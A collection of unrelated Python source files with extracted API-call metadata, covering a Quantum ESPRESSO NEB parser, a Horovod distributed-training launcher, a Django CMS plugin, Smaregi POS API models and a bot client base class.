926), False, 'from django.urls import path\n'), ((932, 1004), 'django.urls.path', 'path', (['"""check-marks/<int:pk>"""', 'views.check_marks_view'], {'name': '"""check-marks"""'}), "('check-marks/<int:pk>', views.check_marks_view, name='check-marks')\n", (936, 1004), False, 'from django.urls import path\n'), ((1010, 1079), 'django.urls.path', 'path', (['"""student-marks"""', 'views.student_marks_view'], {'name': '"""student-marks"""'}), "('student-marks', views.student_marks_view, name='student-marks')\n", (1014, 1079), False, 'from django.urls import path\n'), ((1085, 1147), 'django.urls.path', 'path', (['"""expel/<int:pk>"""', 'views.student_expel_view'], {'name': '"""expel"""'}), "('expel/<int:pk>', views.student_expel_view, name='expel')\n", (1089, 1147), False, 'from django.urls import path\n'), ((1153, 1208), 'django.urls.path', 'path', (['"""video_feed"""', 'views.video_feed'], {'name': '"""video-feed"""'}), "('video_feed', views.video_feed, name='video-feed')\n", (1157, 1208), False, 'from django.urls import path\n'), ((1214, 1269), 'django.urls.path', 'path', (['"""train_feed"""', 'views.train_feed'], {'name': '"""train-feed"""'}), "('train_feed', views.train_feed, name='train-feed')\n", (1218, 1269), False, 'from django.urls import path\n'), ((1275, 1330), 'django.urls.path', 'path', (['"""check_feed"""', 'views.check_feed'], {'name': '"""check-feed"""'}), "('check_feed', views.check_feed, name='check-feed')\n", (1279, 1330), False, 'from django.urls import path\n'), ((1336, 1400), 'django.urls.path', 'path', (['"""logout"""', 'views.student_logout_view'], {'name': '"""student-logout"""'}), "('logout', views.student_logout_view, name='student-logout')\n", (1340, 1400), False, 'from django.urls import path\n'), ((219, 279), 'django.contrib.auth.views.LoginView.as_view', 'LoginView.as_view', ([], {'template_name': '"""student/studentlogin.html"""'}), "(template_name='student/studentlogin.html')\n", (236, 279), False, 'from django.contrib.auth.views import LoginView\n')] |
lin-cp/aiida-quantumespresso | aiida_quantumespresso/parsers/neb.py | 55f2bc8c137a69be24709a119bc285c700997907 | # -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options'
| [((8613, 8629), 'aiida.orm.TrajectoryData', 'TrajectoryData', ([], {}), '()\n', (8627, 8629), False, 'from aiida.orm import ArrayData, TrajectoryData\n'), ((10012, 10023), 'aiida.orm.ArrayData', 'ArrayData', ([], {}), '()\n', (10021, 10023), False, 'from aiida.orm import ArrayData, TrajectoryData\n'), ((2818, 2862), 'aiida_quantumespresso.parsers.parse_raw.neb.parse_raw_output_neb', 'parse_raw_output_neb', (['stdout', 'neb_input_dict'], {}), '(stdout, neb_input_dict)\n', (2838, 2862), False, 'from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb\n'), ((4184, 4235), 'os.path.join', 'os.path.join', (['f"""{PREFIX}_{i + 1}"""', 'f"""{PREFIX}.save"""'], {}), "(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')\n", (4196, 4235), False, 'import os\n'), ((5699, 5742), 'os.path.join', 'os.path.join', (['f"""{PREFIX}_{i + 1}"""', '"""PW.out"""'], {}), "(f'{PREFIX}_{i + 1}', 'PW.out')\n", (5711, 5742), False, 'import os\n'), ((6505, 6574), 'aiida_quantumespresso.parsers.pw.PwParser.build_output_parameters', 'PwParser.build_output_parameters', (['parsed_data_xml', 'parsed_data_stdout'], {}), '(parsed_data_xml, parsed_data_stdout)\n', (6537, 6574), False, 'from aiida_quantumespresso.parsers.pw import PwParser\n'), ((7141, 7228), 'aiida_quantumespresso.parsers.pw.PwParser.final_trajectory_frame_to_parameters', 'PwParser.final_trajectory_frame_to_parameters', (['parsed_parameters', 'parsed_trajectory'], {}), '(parsed_parameters,\n parsed_trajectory)\n', (7186, 7228), False, 'from aiida_quantumespresso.parsers.pw import PwParser\n'), ((7628, 7675), 'aiida_quantumespresso.parsers.parse_raw.convert_qe_to_aiida_structure', 'convert_qe_to_aiida_structure', (['parsed_structure'], {}), '(parsed_structure)\n', (7657, 7675), False, 'from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure\n'), ((6070, 6146), 'aiida_quantumespresso.parsers.parse_raw.pw.parse_stdout', 'parse_pw_stdout', (['pw_out_text', 'pw_input_dict', 'parser_options', 'parsed_data_xml'], {}), '(pw_out_text, pw_input_dict, parser_options, parsed_data_xml)\n', (6085, 6146), True, 'from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout\n'), ((7530, 7597), 'aiida_quantumespresso.parsers.parse_raw.pw.reduce_symmetries', 'reduce_symmetries', (['parsed_parameters', 'parsed_structure', 'self.logger'], {}), '(parsed_parameters, parsed_structure, self.logger)\n', (7547, 7597), False, 'from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries\n'), ((8685, 8716), 'numpy.arange', 'numpy.arange', (['(1)', '(num_images + 1)'], {}), '(1, num_images + 1)\n', (8697, 8716), False, 'import numpy\n'), ((8736, 8754), 'numpy.array', 'numpy.array', (['cells'], {}), '(cells)\n', (8747, 8754), False, 'import numpy\n'), ((8807, 8829), 'numpy.array', 'numpy.array', (['positions'], {}), '(positions)\n', (8818, 8829), False, 'import numpy\n'), ((9038, 9049), 'aiida.orm.ArrayData', 'ArrayData', ([], {}), '()\n', (9047, 9049), False, 'from aiida.orm import ArrayData, TrajectoryData\n'), ((9445, 9466), 'numpy.loadtxt', 'numpy.loadtxt', (['handle'], {}), '(handle)\n', (9458, 9466), False, 'import numpy\n'), ((9597, 9614), 'numpy.array', 'numpy.array', (['[[]]'], {}), '([[]])\n', (9608, 9614), False, 'import numpy\n'), ((9755, 9776), 'numpy.loadtxt', 'numpy.loadtxt', (['handle'], {}), '(handle)\n', (9768, 9776), False, 'import numpy\n'), ((9914, 9931), 'numpy.array', 'numpy.array', (['[[]]'], {}), '([[]])\n', (9925, 9931), False, 'import numpy\n'), ((4472, 4522), 'os.path.join', 'os.path.join', (['relative_output_folder', 'xml_filename'], {}), '(relative_output_folder, xml_filename)\n', (4484, 4522), False, 'import os\n'), ((9145, 9159), 'numpy.array', 'numpy.array', (['v'], {}), '(v)\n', (9156, 9159), False, 'import numpy\n'), ((4676, 4704), 'aiida_quantumespresso.parsers.parse_xml.pw.parse.parse_xml', 'parse_pw_xml', (['xml_file', 'None'], {}), '(xml_file, None)\n', (4688, 4704), True, 'from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml\n'), ((5190, 5211), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (5209, 5211), False, 'import traceback\n')] |
Mindelirium/foundation | foundation/djangocms_submenu/cms_plugins.py | 2d07e430915d696ca7376afea633692119c4d30e | from django.utils.translation import ugettext_lazy as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms.models.pluginmodel import CMSPlugin
class SubmenuPlugin(CMSPluginBase):
model = CMSPlugin
name = _("Submenu")
render_template = "cms/plugins/submenu.html"
plugin_pool.register_plugin(SubmenuPlugin)
| [((318, 360), 'cms.plugin_pool.plugin_pool.register_plugin', 'plugin_pool.register_plugin', (['SubmenuPlugin'], {}), '(SubmenuPlugin)\n', (345, 360), False, 'from cms.plugin_pool import plugin_pool\n'), ((255, 267), 'django.utils.translation.ugettext_lazy', '_', (['"""Submenu"""'], {}), "('Submenu')\n", (256, 267), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
thehardikv/ai-platform-samples | training/horovod/base/horovod_wrapper.py | 0050d12476bcbfdb99d9894a3755a97da5cd80fe | import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
| [((180, 277), 'collections.namedtuple', 'collections.namedtuple', (['"""EnvironmentConfig"""', "['hosts', 'port', 'is_chief', 'pools', 'job_id']"], {}), "('EnvironmentConfig', ['hosts', 'port', 'is_chief',\n 'pools', 'job_id'])\n", (202, 277), False, 'import collections\n'), ((651, 682), 'tensorflow.python.client.device_lib.list_local_devices', 'device_lib.list_local_devices', ([], {}), '()\n', (680, 682), False, 'from tensorflow.python.client import device_lib\n'), ((864, 887), 'multiprocessing.Pool', 'multiprocessing.Pool', (['(1)'], {}), '(1)\n', (884, 887), False, 'import multiprocessing\n'), ((3121, 3156), 'subprocess.call', 'subprocess.call', (['ssh_server_command'], {}), '(ssh_server_command)\n', (3136, 3156), False, 'import subprocess\n'), ((4392, 4433), 'subprocess.call', 'subprocess.call', (['horovod_command'], {'env': 'env'}), '(horovod_command, env=env)\n', (4407, 4433), False, 'import subprocess\n'), ((4660, 4690), 'subprocess.Popen', 'subprocess.Popen', (['iperf_server'], {}), '(iperf_server)\n', (4676, 4690), False, 'import subprocess\n'), ((4744, 4758), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (4754, 4758), False, 'import time\n'), ((4949, 4979), 'subprocess.call', 'subprocess.call', (['iperf_command'], {}), '(iperf_command)\n', (4964, 4979), False, 'import subprocess\n'), ((5206, 5231), 'subprocess.call', 'subprocess.call', (['copy_cmd'], {}), '(copy_cmd)\n', (5221, 5231), False, 'import subprocess\n'), ((5374, 5401), 'os.environ.get', 'os.environ.get', (['"""TF_CONFIG"""'], {}), "('TF_CONFIG')\n", (5388, 5401), False, 'import os\n'), ((5413, 5458), 'os.environ.get', 'os.environ.get', (['"""CLOUD_ML_JOB_ID"""', '"""localrun"""'], {}), "('CLOUD_ML_JOB_ID', 'localrun')\n", (5427, 5458), False, 'import os\n'), ((5598, 5637), 'os.environ.get', 'os.environ.get', (['"""STAGE_GCS_PATH"""', '(False)'], {}), "('STAGE_GCS_PATH', False)\n", (5612, 5637), False, 'import os\n'), ((5836, 5876), 'os.environ.get', 'os.environ.get', (['"""NUM_HOROVOD_RETRIES"""', '(1)'], {}), "('NUM_HOROVOD_RETRIES', 1)\n", (5850, 5876), False, 'import os\n'), ((1228, 1254), 'json.loads', 'json.loads', (['env_config_str'], {}), '(env_config_str)\n', (1238, 1254), False, 'import json\n'), ((1371, 1400), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (1394, 1400), False, 'import collections\n'), ((3318, 3344), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3342, 3344), False, 'import datetime\n'), ((3347, 3390), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'timeout_seconds'}), '(seconds=timeout_seconds)\n', (3365, 3390), False, 'import datetime\n'), ((3431, 3457), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3455, 3457), False, 'import datetime\n'), ((3771, 3784), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3781, 3784), False, 'import time\n'), ((6690, 6730), 'os.environ.get', 'os.environ.get', (['"""GCS_OUTPUT_PATH"""', '(False)'], {}), "('GCS_OUTPUT_PATH', False)\n", (6704, 6730), False, 'import os\n'), ((6884, 6903), 'sys.exit', 'sys.exit', (['exit_code'], {}), '(exit_code)\n', (6892, 6903), False, 'import sys\n'), ((3609, 3637), 'subprocess.call', 'subprocess.call', (['ssh_command'], {}), '(ssh_command)\n', (3624, 3637), False, 'import subprocess\n'), ((5087, 5104), 'os.makedirs', 'os.makedirs', (['dest'], {}), '(dest)\n', (5098, 5104), False, 'import os\n'), ((5675, 5707), 'os.environ.get', 'os.environ.get', (['"""STAGE_GCS_PATH"""'], {}), "('STAGE_GCS_PATH')\n", (5689, 5707), False, 'import os\n'), ((5717, 5756), 'os.environ.get', 'os.environ.get', (['"""STAGING_DIR"""', '"""/input"""'], {}), "('STAGING_DIR', '/input')\n", (5731, 5756), False, 'import os\n'), ((6185, 6227), 'os.environ.get', 'os.environ.get', (['"""BENCHMARK_NETWORK"""', '(False)'], {}), "('BENCHMARK_NETWORK', False)\n", (6199, 6227), False, 'import os\n'), ((6009, 6060), 'os.environ.get', 'os.environ.get', (['"""TASK_STARTUP_TIMEOUT_SECONDS"""', '(600)'], {}), "('TASK_STARTUP_TIMEOUT_SECONDS', 600)\n", (6023, 6060), False, 'import os\n'), ((6772, 6811), 'os.environ.get', 'os.environ.get', (['"""OUTPUT_DIR"""', '"""/output"""'], {}), "('OUTPUT_DIR', '/output')\n", (6786, 6811), False, 'import os\n'), ((6836, 6869), 'os.environ.get', 'os.environ.get', (['"""GCS_OUTPUT_PATH"""'], {}), "('GCS_OUTPUT_PATH')\n", (6850, 6869), False, 'import os\n')] |
shabaraba/SmaregiPy | smaregipy/pos/customer_groups.py | 5447e5da1f21b38c0da1a759ee50b982de1522f7 | import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
客層セクションの更新を行います。
put処理のため、saveメソッドをオーバーライド
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| [((499, 528), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (504, 528), False, 'from pydantic import Field\n'), ((576, 605), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (581, 605), False, 'from pydantic import Field\n'), ((633, 662), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (638, 662), False, 'from pydantic import Field\n'), ((698, 727), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (703, 727), False, 'from pydantic import Field\n'), ((766, 795), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (771, 795), False, 'from pydantic import Field\n'), ((845, 874), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (850, 874), False, 'from pydantic import Field\n'), ((925, 954), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (930, 954), False, 'from pydantic import Field\n'), ((1422, 1451), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1427, 1451), False, 'from pydantic import Field\n'), ((1502, 1531), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1507, 1531), False, 'from pydantic import Field\n'), ((1581, 1610), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1586, 1610), False, 'from pydantic import Field\n'), ((1661, 1690), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1666, 1690), False, 'from pydantic import Field\n'), ((2048, 2111), 'smaregipy.utils.DictUtil.convert_key_to_snake', 'DictUtil.convert_key_to_snake', (['response[self.Response.KEY_DATA]'], {}), '(response[self.Response.KEY_DATA])\n', (2077, 2111), False, 'from smaregipy.utils import NoData, DictUtil\n')] |
JCab09/StickyDJ-Bot | StickyDJ-Bot/src/clients/client.py | feaf2229a6729be6ad022f9105da19192e3a91d3 | #!/usr/bin/env python3
"""
Base-Client Class
This is the parent-class of all client-classes and holds properties and functions they all depend on.
Author: Jason Cabezuela
"""
import src.util.debugger as Debugger
import src.util.configmaker as configmaker
class BaseClient(object):
"""Base-Client Class"""
def __init__(self, configpath, configtype, debugFlag = False):
self._Debug = Debugger.Debugger(debugFlag)
self._Debug.write("INIT BaseClient")
defaultPrompt = "-"
self._prompt = defaultPrompt
self._clientConfig = configmaker.getConfig(configpath, configtype)
self._Debug.write("INIT_END BaseClient")
@property
def prompt(self):
return self._prompt
def get_client_configuration():
"""Base Class for getting client configuration"""
def load_client_configuration():
"""Base Class for loading client configuration into memory"""
